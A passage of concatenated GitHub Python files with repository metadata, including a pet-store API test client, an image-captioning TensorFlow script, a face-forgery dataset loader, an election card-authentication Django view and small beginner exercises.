print(result)\n return status, result\n\n def delete_pet(self, auth_key: json, pet_id: str) -> json:\n \"\"\"Метод удаляет питомца\"\"\"\n headers = {'auth_key': auth_key['key']}\n res = requests.delete(self.base_url + 'api/pets/' + pet_id, headers=headers)\n status = res.status_code\n result = \"\"\n try:\n result = res.json()\n except json.decoder.JSONDecodeError:\n result = res.text\n return status, result\n\n def update_pet_info(self, auth_key: json, pet_id: str, name: str,\n animal_type: str, age: int) -> json:\n \"\"\"Метод обновляет данные питомца\"\"\"\n headers = {'auth_key': auth_key['key']}\n data = {\n 'name': name,\n 'age': age,\n 'animal_type': animal_type\n }\n\n res = requests.put(self.base_url + 'api/pets/' + pet_id, headers=headers, data=data)\n status = res.status_code\n result = \"\"\n try:\n result = res.json()\n except json.decoder.JSONDecodeError:\n result = res.text\n return status, result\n\n def post_create_pet_simple(self, auth_key:json, name:str,\n animal_type:str, age:str) -> json:\n \"\"\"Метод добавляет данные о питомце без фото\"\"\"\n heardes = {'auth_key': auth_key['key']}\n data= {'name': name, 'animal_type': animal_type, 'age': age}\n res = requests.post(self.base_url+'api/create_pet_simple', headers= heardes, data= data)\n status = res.status_code\n result = \"\"\n try:\n result = res.json()\n except:\n result = res.text\n return status, result\n\n def post_add_photo_pets(self, auth_key:json,\n pet_id : str, pet_photo:str) -> json:\n \"\"\"Метод добавляет фото питомца\"\"\"\n data = MultipartEncoder(\n fields={\n 'pet_photo': (pet_photo, open(pet_photo, 'rb'), 'image/jpeg')\n })\n heardes = {'auth_key': auth_key['key'],\n 'Content-Type': data.content_type}\n res= requests.post(self.base_url+'api/pets/set_photo/'+pet_id,\n headers=heardes, data=data)\n status = res.status_code\n result = \"\"\n try:\n result = res.json()\n except:\n result = res.text\n return status, result","repo_name":"LousySkill/PythonTheme","sub_path":"PetFriendsApiTests/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":4557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"32271949811","text":"#题目:输入3个数a,b,c,按大小顺序输出。\nn1 = int(input('n1 = :\\n'))\nn2 = int(input('n2 = :\\n'))\nn3 = int(input('n3 = :\\n'))\ndef swap(p1,p2):\n return p2,p1\nif n1 > n2 : \n n1,n2 = swap(n1,n2)\nif n1 > n3 :\n n1,n3 = swap(n1,n3)\nif n2 > n3 : \n n2,n3 = swap(n2,n3)\nprint (n1,n2,n3)","repo_name":"lidongteam/LaserSLAM","sub_path":"新人培训/陈宏干/答案/习题66.py","file_name":"习题66.py","file_ext":"py","file_size_in_byte":302,"program_lang":"python","lang":"zh","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"}
+{"seq_id":"9578151677","text":"#Leia um número e escreva se o número é inteiro ou decimal.\n\ndef main():\n \n print('INTEIRO OU DECIMAL?\\n')\n numero = float(input('Número: '))\n result = eh_racional(numero)\n print(f'O número {numero} é {result}')\n\ndef eh_racional(numero):\n \n p_decimal = numero % 1\n if p_decimal == 0:\n return 'inteiro'\n else:\n return 'decimal'\n\nmain()","repo_name":"MicherlaneSilva/ifpi-ads-algoritmos2020","sub_path":"fabio_2/fabio_2_p2/f2_p2_q12.py","file_name":"f2_p2_q12.py","file_ext":"py","file_size_in_byte":381,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"5285815513","text":"# Import TensorFlow and enable eager execution\n# This code requires TensorFlow version >=1.9\nimport pickle\nfrom PIL import Image\nfrom glob import glob\nimport json\nimport time\nimport os\nimport numpy as np\nimport re\nfrom sklearn.utils import shuffle\nfrom sklearn.model_selection import train_test_split\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\ntf.enable_eager_execution()\n\n# We'll generate plots of attention in order to see which parts of an image\n# our model focuses on during captioning\n\n# Scikit-learn includes many helpful utilities\n\n\n######################## Download MS-COCO dataset\nannotation_zip = tf.keras.utils.get_file('captions.zip',\n cache_subdir=os.path.abspath('.'),\n origin='http://images.cocodataset.org/annotations/annotations_trainval2014.zip',\n extract=True)\nannotation_file = os.path.dirname(\n annotation_zip)+'/annotations/captions_train2014.json'\n\nname_of_zip = 'train2014.zip'\nif not os.path.exists(os.path.abspath('.') + '/' + name_of_zip):\n image_zip = tf.keras.utils.get_file(name_of_zip,\n cache_subdir=os.path.abspath('.'),\n origin='http://images.cocodataset.org/zips/train2014.zip',\n extract=True)\n PATH = os.path.dirname(image_zip)+'/train2014/'\nelse:\n PATH = os.path.abspath('.')+'/train2014/'\n\n######################## Limit the size of training set for training faster\n# read the json file\nwith open(annotation_file, 'r') as f:\n annotations = json.load(f)\n\n# storing the captions and the image name in vectors\nall_captions = []\nall_img_name_vector = []\n\nfor annot in annotations['annotations']:\n caption = ' ' + annot['caption'] + ' '\n image_id = annot['image_id']\n full_coco_image_path = PATH + 'COCO_train2014_' + '%012d.jpg' % (image_id)\n\n all_img_name_vector.append(full_coco_image_path)\n all_captions.append(caption)\n\n# shuffling the captions and image_names together\n# setting a random state\ntrain_captions, img_name_vector = shuffle(all_captions,\n all_img_name_vector,\n random_state=1)\n\n# selecting the first 30000 captions from the shuffled set\nnum_examples = 500\ntrain_captions = train_captions[:num_examples]\nimg_name_vector = img_name_vector[:num_examples]\n\nprint(len(train_captions), len(all_captions))\n\n######################## Preprocess the images using InceptionV3\ndef load_image(image_path):\n img = tf.read_file(image_path)\n img = tf.image.decode_jpeg(img, channels=3)\n img = tf.image.resize_images(img, (299, 299))\n img = tf.keras.applications.inception_v3.preprocess_input(img)\n return img, image_path\n\n\n######################## Initialize InceptionV3 and load the pretrained Imagenet weights\nimage_model = tf.keras.applications.InceptionV3(include_top=False,\n weights='imagenet')\nnew_input = image_model.input\nhidden_layer = image_model.layers[-1].output\n\nimage_features_extract_model = tf.keras.Model(new_input, hidden_layer)\n\n######################## Caching the features extracted from InceptionV3\n# getting the unique images\nencode_train = sorted(set(img_name_vector))\n\n# feel free to change the batch_size according to your system configuration\nimage_dataset = tf.data.Dataset.from_tensor_slices(\n encode_train).map(load_image).batch(16)\n\nfor img, path in image_dataset:\n batch_features = image_features_extract_model(img)\n batch_features = tf.reshape(batch_features,\n (batch_features.shape[0], -1, batch_features.shape[3]))\n\n for bf, p in zip(batch_features, path):\n path_of_feature = p.numpy().decode(\"utf-8\")\n np.save(path_of_feature, bf.numpy())\n\n######################## Preprocess and tokenize the captions\n# This will find the maximum length of any caption in our dataset\n\n\ndef calc_max_length(tensor):\n return max(len(t) for t in tensor)\n\n\n# The steps above is a general process of dealing with text processing\n# choosing the top 5000 words from the vocabulary\ntop_k = 5000\ntokenizer = tf.keras.preprocessing.text.Tokenizer(num_words=top_k,\n oov_token=\"\",\n filters='!\"#$%&()*+.,-/:;=?@[\\]^_`{|}~ ')\ntokenizer.fit_on_texts(train_captions)\ntrain_seqs = tokenizer.texts_to_sequences(train_captions)\ntokenizer.word_index[''] = 0\n\n# creating the tokenized vectors\ntrain_seqs = tokenizer.texts_to_sequences(train_captions)\n\n# padding each vector to the max_length of the captions\n# if the max_length parameter is not provided, pad_sequences calculates that automatically\ncap_vector = tf.keras.preprocessing.sequence.pad_sequences(\n train_seqs, padding='post')\n\n# calculating the max_length\n# used to store the attention weights\nmax_length = calc_max_length(train_seqs)\n\n######################## Split the data into training and testing\n# Create training and validation sets using 80-20 split\nimg_name_train, img_name_val, cap_train, cap_val = train_test_split(img_name_vector,\n cap_vector,\n test_size=0.2,\n random_state=0)\nprint(len(img_name_train), len(cap_train), len(img_name_val), len(cap_val))\n\n######################## Our images and captions are ready! Next, let's create a tf.data dataset to use for training our model.\n# feel free to change these parameters according to your system's configuration\nBATCH_SIZE = 64\nBUFFER_SIZE = 1000\nembedding_dim = 256\nunits = 512\nvocab_size = len(tokenizer.word_index)\n# shape of the vector extracted from InceptionV3 is (64, 2048)\n# these two variables represent that\nfeatures_shape = 2048\nattention_features_shape = 64\n\n# loading the numpy files \n\ndef map_func(img_name, cap):\n img_tensor = np.load(img_name.decode('utf-8')+'.npy')\n return img_tensor, cap\n\ndataset = tf.data.Dataset.from_tensor_slices((img_name_train, cap_train))\n\n# using map to load the numpy files in parallel\n# NOTE: Be sure to set num_parallel_calls to the number of CPU cores you have\n# https://www.tensorflow.org/api_docs/python/tf/py_func\ndataset = dataset.map(lambda item1, item2: tf.py_func(\n map_func, [item1, item2], [tf.float32, tf.int32]), num_parallel_calls=8)\n\n# shuffling and batching\ndataset = dataset.shuffle(BUFFER_SIZE)\n# https://www.tensorflow.org/api_docs/python/tf/contrib/data/batch_and_drop_remainder\ndataset = dataset.batch(BATCH_SIZE)\ndataset = dataset.prefetch(1)\n\n##################### Model\n\ndef gru(units):\n # If you have a GPU, we recommend using the CuDNNGRU layer (it provides a\n # significant speedup).\n if tf.test.is_gpu_available():\n return tf.keras.layers.CuDNNGRU(units,\n return_sequences=True,\n return_state=True,\n recurrent_initializer='glorot_uniform')\n else:\n return tf.keras.layers.GRU(units,\n return_sequences=True,\n return_state=True,\n recurrent_activation='sigmoid',\n recurrent_initializer='glorot_uniform')\n\n\nclass BahdanauAttention(tf.keras.Model):\n def __init__(self, units):\n super(BahdanauAttention, self).__init__()\n self.W1 = tf.keras.layers.Dense(units)\n self.W2 = tf.keras.layers.Dense(units)\n self.V = tf.keras.layers.Dense(1)\n\n def call(self, features, hidden):\n # features(CNN_encoder output) shape == (batch_size, 64, embedding_dim)\n\n # hidden shape == (batch_size, hidden_size)\n # hidden_with_time_axis shape == (batch_size, 1, hidden_size)\n hidden_with_time_axis = tf.expand_dims(hidden, 1)\n\n # score shape == (batch_size, 64, hidden_size)\n score = tf.nn.tanh(self.W1(features) + self.W2(hidden_with_time_axis))\n\n # attention_weights shape == (batch_size, 64, 1)\n # we get 1 at the last axis because we are applying score to self.V\n attention_weights = tf.nn.softmax(self.V(score), axis=1)\n\n # context_vector shape after sum == (batch_size, hidden_size)\n context_vector = attention_weights * features\n context_vector = tf.reduce_sum(context_vector, axis=1)\n\n return context_vector, attention_weights\n\nclass CNN_Encoder(tf.keras.Model):\n # Since we have already extracted the features and dumped it using pickle\n # This encoder passes those features through a Fully connected layer\n def __init__(self, embedding_dim):\n super(CNN_Encoder, self).__init__()\n # shape after fc == (batch_size, 64, embedding_dim)\n self.fc = tf.keras.layers.Dense(embedding_dim)\n \n def call(self, x):\n x = self.fc(x)\n x = tf.nn.relu(x)\n return x\n\nclass RNN_Decoder(tf.keras.Model):\n def __init__(self, embedding_dim, units, vocab_size):\n super(RNN_Decoder, self).__init__()\n self.units = units\n\n self.embedding = tf.keras.layers.Embedding(vocab_size, embedding_dim)\n self.gru = gru(self.units)\n self.fc1 = tf.keras.layers.Dense(self.units)\n self.fc2 = tf.keras.layers.Dense(vocab_size)\n \n self.attention = BahdanauAttention(self.units)\n \n def call(self, x, features, hidden):\n # defining attention as a separate model\n context_vector, attention_weights = self.attention(features, hidden)\n \n # x shape after passing through embedding == (batch_size, 1, embedding_dim)\n x = self.embedding(x)\n \n # x shape after concatenation == (batch_size, 1, embedding_dim + hidden_size)\n x = tf.concat([tf.expand_dims(context_vector, 1), x], axis=-1)\n \n # passing the concatenated vector to the GRU\n output, state = self.gru(x)\n \n # shape == (batch_size, max_length, hidden_size)\n x = self.fc1(output)\n \n # x shape == (batch_size * max_length, hidden_size)\n x = tf.reshape(x, (-1, x.shape[2]))\n \n # output shape == (batch_size * max_length, vocab)\n x = self.fc2(x)\n\n return x, state, attention_weights\n\n def reset_state(self, batch_size):\n return tf.zeros((batch_size, self.units))\n\nencoder = CNN_Encoder(embedding_dim)\ndecoder = RNN_Decoder(embedding_dim, units, vocab_size)\n\noptimizer = tf.train.AdamOptimizer()\n\n# We are masking the loss calculated for padding\ndef loss_function(real, pred):\n mask = 1 - np.equal(real, 0)\n loss_ = tf.nn.sparse_softmax_cross_entropy_with_logits(labels=real, logits=pred) * mask\n return tf.reduce_mean(loss_)\n\n\n########################## training \n# adding this in a separate cell because if you run the training cell \n# many times, the loss_plot array will be reset\nloss_plot = []\nEPOCHS = 20\n\nfor epoch in range(EPOCHS):\n start = time.time()\n total_loss = 0\n\n for (batch, (img_tensor, target)) in enumerate(dataset):\n loss = 0\n\n # initializing the hidden state for each batch\n # because the captions are not related from image to image\n hidden = decoder.reset_state(batch_size=target.shape[0])\n\n dec_input = tf.expand_dims(\n [tokenizer.word_index['']] * BATCH_SIZE, 1)\n\n with tf.GradientTape() as tape:\n features = encoder(img_tensor)\n\n for i in range(1, target.shape[1]):\n # passing the features through the decoder\n predictions, hidden, _ = decoder(dec_input, features, hidden)\n\n loss += loss_function(target[:, i], predictions)\n\n # using teacher forcing\n dec_input = tf.expand_dims(target[:, i], 1)\n\n total_loss += (loss / int(target.shape[1]))\n\n variables = encoder.variables + decoder.variables\n\n gradients = tape.gradient(loss, variables)\n\n optimizer.apply_gradients(\n zip(gradients, variables), tf.train.get_or_create_global_step())\n\n if batch % 100 == 0:\n print('Epoch {} Batch {} Loss {:.4f}'.format(epoch + 1,\n batch,\n loss.numpy() / int(target.shape[1])))\n # storing the epoch end loss value to plot later\n loss_plot.append(total_loss / len(cap_vector))\n\n print('Epoch {} Loss {:.6f}'.format(epoch + 1,\n total_loss/len(cap_vector)))\n print('Time taken for 1 epoch {} sec\\n'.format(time.time() - start))\n\n\nplt.plot(loss_plot)\nplt.xlabel('Epochs')\nplt.ylabel('Loss')\nplt.title('Loss Plot')\nplt.show()\n\n'''\n Evaluation part\n'''\n\ndef evaluate(image):\n attention_plot = np.zeros((max_length, attention_features_shape))\n\n hidden = decoder.reset_state(batch_size=1)\n\n temp_input = tf.expand_dims(load_image(image)[0], 0)\n img_tensor_val = image_features_extract_model(temp_input)\n img_tensor_val = tf.reshape(img_tensor_val, (img_tensor_val.shape[0], -1, img_tensor_val.shape[3]))\n\n features = encoder(img_tensor_val)\n\n dec_input = tf.expand_dims([tokenizer.word_index['']], 0)\n result = []\n\n for i in range(max_length):\n predictions, hidden, attention_weights = decoder(dec_input, features, hidden)\n\n attention_plot[i] = tf.reshape(attention_weights, (-1, )).numpy()\n\n predicted_id = tf.argmax(predictions[0]).numpy()\n result.append(tokenizer.index_word[predicted_id])\n\n if tokenizer.index_word[predicted_id] == '':\n return result, attention_plot\n\n dec_input = tf.expand_dims([predicted_id], 0)\n\n attention_plot = attention_plot[:len(result), :]\n return result, attention_plot\n\ndef plot_attention(image, result, attention_plot):\n temp_image = np.array(Image.open(image))\n\n fig = plt.figure(figsize=(10, 10))\n \n len_result = len(result)\n for l in range(len_result):\n temp_att = np.resize(attention_plot[l], (8, 8))\n ax = fig.add_subplot(len_result//2, len_result//2, l+1)\n ax.set_title(result[l])\n img = ax.imshow(temp_image)\n ax.imshow(temp_att, cmap='gray', alpha=0.6, extent=img.get_extent())\n\n plt.tight_layout()\n plt.show()\n\n\n# captions on the validation set\nrid = np.random.randint(0, len(img_name_val))\nimage = img_name_val[rid]\nreal_caption = ' '.join([tokenizer.index_word[i] for i in cap_val[rid] if i not in [0]])\nresult, attention_plot = evaluate(image)\n\nprint ('Real Caption:', real_caption)\nprint ('Prediction Caption:', ' '.join(result))\nplot_attention(image, result, attention_plot)\n# opening the image\nImage.open(img_name_val[rid])\n","repo_name":"PotatoThanh/Residual-Self-Attention-Net","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":14712,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"}
+{"seq_id":"30790044276","text":"from flask import Flask, request, render_template\nfrom utils import get_timestamps, get_classes_info\n\ndays = {\n\t'monday': 'Mon',\n\t'tuesday': 'Tue',\n\t'wednesday': 'Wed',\n\t'thursday': 'Thu',\n\t'friday': 'Fri',\n\t# 'saturday': 'Sat',\n\t# 'sunday': 'Sun'\n}\n\napp = Flask(__name__)\n\n\n@app.route('/golf')\ndef index():\n\tselected_day = request.args.get('selected_day') or 'monday'\n\n\ttimestamps = get_timestamps()\t\n\tclasses_info = get_classes_info(selected_day)\n\n\treturn render_template('index.html', days=days, selected_day=selected_day, timestamps=timestamps, classes_info=classes_info)\n\n\nif __name__ == '__main__':\n\tapp.run(debug=True, host='0.0.0.0', port=3000)\n","repo_name":"fast40/schedules","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"74379596851","text":"import tensorflow as tf\nimport cv2\nimport os\n\n# Categories = ['Aadhar','PAN']\nl = [x[1] for x in os.walk('../resources/')]\nl[2].sort()\nCategories = l[2]\nnumcat = len(Categories)\nthreshold = 1/numcat\n\nllll = [x[1] for x in os.walk('../model/')]\nlll = llll[0]\n# print(lll)\n\n\ndef prepare(filepath):\n IMG_SIZE = 224\n img_array = cv2.imread(filepath)\n new_array = cv2.resize(img_array,(IMG_SIZE,IMG_SIZE))\n return new_array.reshape(-1,IMG_SIZE,IMG_SIZE,3,1)\n\n\n# model = tf.keras.models.load_model('../model/model1')\n\n# # print(img2.shape)\n# prediction = model.predict([prepare('../../uploads/example.jpeg')])\n# print(prediction)\n# print(int(prediction[0][0]))\n# print( Categories[int(prediction[0][1])] )\n\n# st = pytesseract.image_to_string(img)\n# print(st)\n\n\ndef predict(filepath):\n img = cv2.imread(filepath)\n model_path =''\n \n if 'model2' in lll:\n model_path = '../model/model2'\n else:\n model_path = '../model/model1'\n\n\n #loading the trained model\n model = tf.keras.models.load_model(model_path) #make this dynamic later\n\n \n prediction = model.predict([prepare(filepath)])\n \n ll = list(prediction[0]) # converting numpy array to list \n pos = ll.index(max(ll))\n \n\n if(ll[pos]>threshold):\n f = open(\"../resources/classification_output/out.txt\", \"w\")\n f.write(Categories[pos])\n f.close()\n return ( Categories[pos] )\n \n else:\n return ('new')\n\n\n # return ( Categories[int(prediction[0][1])] )\n \n\n\n ","repo_name":"Aravind2503/Document-detection","sub_path":"python/src/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":1487,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"7854066020","text":"import os\nimport numpy as np\nimport torch\nimport matplotlib.pyplot as plt\nimport torchvision\nimport cv2\nfrom torch.utils import data\n\nfrom dataset.blend_utils.faceBlending import Blender\nfrom dataset.aug_trans.aug_trans import Augmentator, data_transform\n\n\nclass BI_dataset_saved_aug(data.Dataset):\n \"\"\"读取和测试的 BI 数据集,标签写在 list.txt 里,采用 albumentations 做增强\n \n 读取参数:目录、具体路径与标签名(如果是1,应该有对应路径+_label.jpg的标签)\n root 目录下应该有 0.jpg 的全黑图片,对应标签为 0 的 xray\n 对于 test set,返回的 xray label 就是 cls_label\n \"\"\"\n\n def __init__(self, root, list_name, mode='train', Transform='simple'):\n super(BI_dataset_saved_aug, self).__init__()\n if mode not in ['train', 'valid', 'test'] or\\\n Transform not in ['simple', 'pixel']:\n raise NotImplementedError()\n\n self.mode = 'train'\n if mode == 'test':\n self.mode = 'test'\n \n self.root = root\n list_path = os.path.join(root, list_name)\n\n self._parse_data(list_path)\n\n \n if Transform == 'simple':\n self.pixel_aug = Augmentator('simple')\n self.spatial_aug = None\n elif Transform == 'pixel':\n self.pixel_aug = Augmentator('pixel_aug')\n self.spatial_aug = None\n else:\n raise NotImplementedError(Transform)\n\n # 只为用到 Blender.img_loader,为了保持与训练一致\n self.blender = Blender(\n ldmPath=None, dataPath=None,\n topk=100, selectNum=1, gaussianKernel=[31,63], gaussianSigma=[7, 15], loader='cv',\n pixel_aug=self.pixel_aug, spatial_aug=self.spatial_aug\n )\n\n self.trans_image = data_transform(normalize=True)\n self.trans_xray = data_transform(normalize=False)\n \n def _parse_data(self, list_path):\n\n labels, img_paths = [], []\n with open(list_path, 'r') as f:\n for line in f:\n label, img_path = line.strip().split()\n labels.append(int(label))\n img_paths.append(img_path)\n\n self.files = []\n cnts = [0, 0]\n\n for label, name in zip(labels, img_paths):\n img_file = os.path.join(self.root, name)\n if self.mode == 'test':\n label_file = None\n elif label == 0:\n label_file = os.path.join(self.root, \"0.jpg\")\n elif label == 1:\n nameRoot, ext = os.path.splitext(name)\n label_file = os.path.join(self.root, \"%s_label%s\" % (nameRoot, ext))\n else:\n raise NotImplementedError('label: %d' % label)\n cnts[label] += 1\n \n cls_label = label\n self.files.append({\n \"img\": img_file,\n \"label\": label_file,\n \"cls_label\": cls_label,\n \"name\": name\n })\n print('[DATA] label images for dataset %s: %d:%d' %(list_path, *cnts))\n\n def __len__(self):\n\n return len(self.files)\n\n def __getitem__(self, index):\n\n datafiles = self.files[index]\n\n name = datafiles[\"name\"]\n image = self.blender.img_loader(datafiles[\"img\"])\n cls_label = int(datafiles[\"cls_label\"])\n\n xray = None\n if self.mode != 'test':\n xray = self.blender.img_loader(datafiles[\"label\"], gray=True)\n # xray = np.expand_dims(xray, 0)\n else:\n xray = cls_label\n\n size_origin = image.size # W * H\n\n # 将opencv image转换为Tensor\n image = self.trans_image(image=image)['image']\n if self.mode != 'test': # 测试下没有 xray 的 label 标签\n xray = self.trans_xray(image=xray)['image']\n xray = xray.unsqueeze(0)\n\n return image, xray, cls_label, np.array(size_origin), name\n\n\n# 测试\nif __name__ == '__main__':\n\n ROOTPATH = '/nas/hjr/FF++c23/original'\n LISTNAME = 'selected10kTrain.txt'\n Batch_size = 4\n\n dataset = BI_dataset_saved_aug(root=ROOTPATH, list_name = LISTNAME, mode='train', Transform='simple')\n dataloader = torch.utils.data.DataLoader(dataset=dataset, batch_size=Batch_size, shuffle=True)\n\n plt.ion()\n\n for i, data in enumerate(dataloader):\n imgs, labels, cls_label, _, _ = data\n import pdb\n pdb.set_trace()\n\n # 减少第0个维度\n # imgs = imgs.squeeze(0)\n # labels = labels.squeeze(0)\n\n # 把所有图像拼在一起\n img = torchvision.utils.make_grid(imgs).numpy()\n labels = torchvision.utils.make_grid(labels).numpy()\n\n imgs = np.transpose(img, (1, 2, 0))\n labels = np.transpose(labels, (1, 2, 0))\n\n plt.imshow(imgs)\n plt.show()\n plt.pause(0.5)\n\n","repo_name":"jerry4h/Face_Xray","sub_path":"Net_gpuVer5.0/dataset/BI_dataset_saved_aug.py","file_name":"BI_dataset_saved_aug.py","file_ext":"py","file_size_in_byte":4856,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"21"}
+{"seq_id":"18428294710","text":"import logging\nfrom .generics import BaseElectionView\nfrom core.exceptions import AlreadyVoted, CardInvalid, ElectorBanned, ElectorSuspicious, NotQualified\nfrom core.serializers import AuthenticateSerializer\nfrom core.services import aca, AuthenticationError\nfrom core.models import Ballot, Elector, Session\nfrom django.conf import settings\nfrom rest_framework.response import Response\n\nlogger = logging.getLogger('vote')\n\nclass AuthenticateView(BaseElectionView):\n \"\"\"\n Authenticates card information against ACA API and returns available ballots.\n \"\"\"\n serializer_class = AuthenticateSerializer\n\n def post(self, request, *args, **kwargs):\n # Sanitize input\n election = self.get_object()\n station = request.user.station\n validated_data = self.get_validated_data(request)\n\n # Read validated data and authenticate against ACA\n internal_id = validated_data['internal_id']\n student_id = validated_data['student_id']\n revision = validated_data['revision']\n\n # Prepare the session\n session = Session.objects.create(election=election, station=station, student_id=student_id, revision=revision)\n\n # Authentication methods:\n # 1) internal + student ID [\"strict\" mode]\n # 2) internal ID only [\"quirk\" mode] (for less capable NFC clients)\n # 3) student ID only (rely on client side validation)\n\n # Log the request first\n if settings.CARD_VALIDATION_QUIRK:\n logger.info('Station %s requests card (%s****)', station.id, internal_id[:4])\n else:\n logger.info('Station %s requests card %s[%s]', student_id, revision)\n\n # Call corresponding ACA API\n try:\n if not settings.CARD_VALIDATION_OFF:\n info = aca.to_student_id(internal_id) # Use internal ID to authenicate\n\n # Double check if student ID matches in strict mode\n if settings.CARD_VALIDATION_STRICT and info.id != student_id:\n logger.warning('ID %s returned instead', info.id)\n session.save_state(Session.NOT_AUTHENTICATED)\n raise ElectorSuspicious\n\n else:\n student_id_with_rev = student_id + str(revision)\n info = aca.query_student(student_id_with_rev) # Query student ID instead\n\n # Error handling\n # We don't catch ExternalError as we can do nothing about it.\n except AuthenticationError as e:\n session.save_state(Session.NOT_AUTHENTICATED)\n code = e.get_codes()\n if code == 'card_invalid':\n raise CardInvalid\n else: # Let ACA error codes pass through\n raise ElectorSuspicious(code=code)\n\n # Now that ACA has verified the elector,\n # we'll check against our record if there were any previous voting sessions.\n sessions = Session.objects.filter(student_id=student_id)\n\n # 1) Check if the elector has voted or not\n if sessions.filter(state__in=(Session.VOTING, Session.VOTED, Session.REMOTE_VOTED)).exists():\n session.save_state(Session.NOT_AUTHENTICATED)\n raise AlreadyVoted\n # 2) Check if the elector was banned (either by registering remote voting\n # or earlier unlawful attempts.)\n elif sessions.filter(state__in=(Session.ABORTED, Session.BANNED)).exists():\n session.save_state(Session.NOT_AUTHENTICATED)\n raise ElectorBanned\n\n # 3) Iterate through previous records, cancel out incomplete sessions;\n # double-check on previous information if available.\n for old_session in sessions.order_by('created'):\n # Check on previous revision record; reject if using an older one.\n if old_session.revision > revision:\n session.save_state(Session.NOT_AUTHENTICATED)\n raise ElectorSuspicious\n\n # Cancel out older sessions\n if old_session.state in (Session.AUTHORIZED, Session.CANCELED):\n # Session terminated before booth allocation.\n if old_session.state == Session.AUTHORIZED:\n logger.info('Expiring session #%s [S%s] (2 → Z)', old_session.id, old_session.station.id)\n old_session.save_state(Session.CANCELED)\n else:\n logger.info('Found old canceled session #%s [S%s]', old_session.id, old_session.station.id)\n\n # Since the elector has confirmed their identity and we've already\n # requested an auth code based on that, no re-evaluation would be done.\n # We'll just return cached identities instead.\n ballots = old_session.ballots.all()\n session.auth_code = old_session.auth_code\n session.save_state(Session.AUTHENTICATED)\n session.ballots.add(*ballots)\n\n return Response({\n 'status': 'success', 'session_key': session.key, 'cached': True,\n 'college': info.college, 'department': info.department,\n 'ballots': [ballot.name for ballot in ballots],\n })\n\n elif old_session.state == Session.AUTHENTICATED:\n # Session terminated before confirming identity.\n # No big deal. We'll just invalidate this session.\n logger.info('Expiring session #%s [S%s] (1 → Y)', old_session.id, old_session.station.id)\n old_session.save_state(Session.NOT_VERIFIED)\n\n elif old_session.state != Session.NOT_AUTHENTICATED:\n # Either we've bumped into CREATED or some unknown state.\n # Shouldn't occur but we'll cancel it out anyway.\n logger.warning('Expiring session #%s [S%s] (%s → X)', old_session.id, old_session.station.id, old_session.state)\n old_session.save_state(Session.NOT_AUTHENTICATED)\n\n #\n # ...Authentication succeeded.\n\n # Build up elector information for condition matching\n student_type = info.id[0]\n elector_data = {\n # Known information\n 'type': student_type, 'college': info.college_id, 'department': info.department,\n # Normalized information\n 'standing': ('R' if student_type in settings.GRADUATE_CODE else\n ('B' if student_type in settings.UNDERGRADUATE_CODE else '')),\n }\n\n # Filter out ineligible identities as regulated in Election & Recall Act §13(2).\n if student_type not in settings.GENERAL_CODE:\n logger.warning('Student %s does not qualify as elector', student_id)\n session.save_state(Session.NOT_AUTHENTICATED)\n raise NotQualified\n\n # Iterate through ballots and check eligibility\n ballots = []\n for ballot in Ballot.objects.all_ballots(election=election):\n # 1) Check if the elector is explicitly specified in list.\n # Takes presedence over all ballot conditions.\n try:\n elector = ballot.electors.get(student_id=student_id)\n if elector.is_allowed:\n ballots.append(ballot)\n continue\n except Elector.DoesNotExist:\n pass # This elector isn't explicitly black/whitelisted. Good.\n\n # 2) Matches the elector data against ballot conditions.\n # We've done the logic on models, so just call the method.\n if ballot.match(fields=elector_data):\n ballots.append(ballot)\n\n # 3) Checks if there is at least one ballot to vote.\n if not ballots:\n logger.warning('Student %s does not qualify any ballot', student_id)\n session.save_state(Session.NOT_AUTHENTICATED)\n raise NotQualified # Fail if there aren't any\n\n # Saves the session and intermediate information\n session.ballots.add(*ballots)\n session.save_state(Session.AUTHENTICATED)\n\n # Returns the ballot information and the session key for further operation\n return Response({\n 'status': 'success', 'session_key': session.key,\n 'college': info.college, 'department': info.department,\n 'ballots': [ballot.name for ballot in ballots],\n })\n","repo_name":"rschiang/ntu-vote-auth-server","sub_path":"core/views/authenticate.py","file_name":"authenticate.py","file_ext":"py","file_size_in_byte":8353,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"21"}
+{"seq_id":"16562884452","text":"from sly import Lexer\n\nclass SLexer(Lexer) :\n tokens = {\n LETTERS,\n SPECS,\n NUMS,\n OP,\n OPEN,\n CLOSE,\n SPACE,\n }\n\n LETTERS = r'[a-zA-Z]+'\n SPECS = r'[\\'|\\\"]+'\n NUMS = r'[0-9]+'\n OP = r'[+|-|*|/|%|=]'\n \n OPEN = r'[(]'\n CLOSE = r'[)]'\n\n ignore = ' \\t'\n\nif __name__ == '__main__':\n lexer = SLexer()\n while True :\n x = input()\n for tok in lexer.tokenize(x) :\n if x == 'exit' :\n exit()\n print('type=%r, value=%r' % (tok.type, tok.value))","repo_name":"CodeWizrd001/CompilerLab","sub_path":"Trials/Python/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
